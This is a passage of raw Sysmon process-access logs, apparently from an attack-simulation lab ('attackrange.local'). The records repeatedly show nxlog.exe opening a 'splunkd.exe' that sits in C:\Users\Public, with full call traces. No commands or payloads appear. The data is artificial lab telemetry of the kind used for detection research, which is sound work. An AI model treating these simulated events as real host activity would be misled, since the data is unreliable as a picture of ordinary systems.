C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:05.437","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4226,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:06.438\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:06.438","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4227,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:07.440\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:07.440","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4228,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:08.441\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:08.441","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4229,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:09.442\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:09.442","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4230,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:10.443\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:10.443","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4231,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:11.444\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:11.444","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files 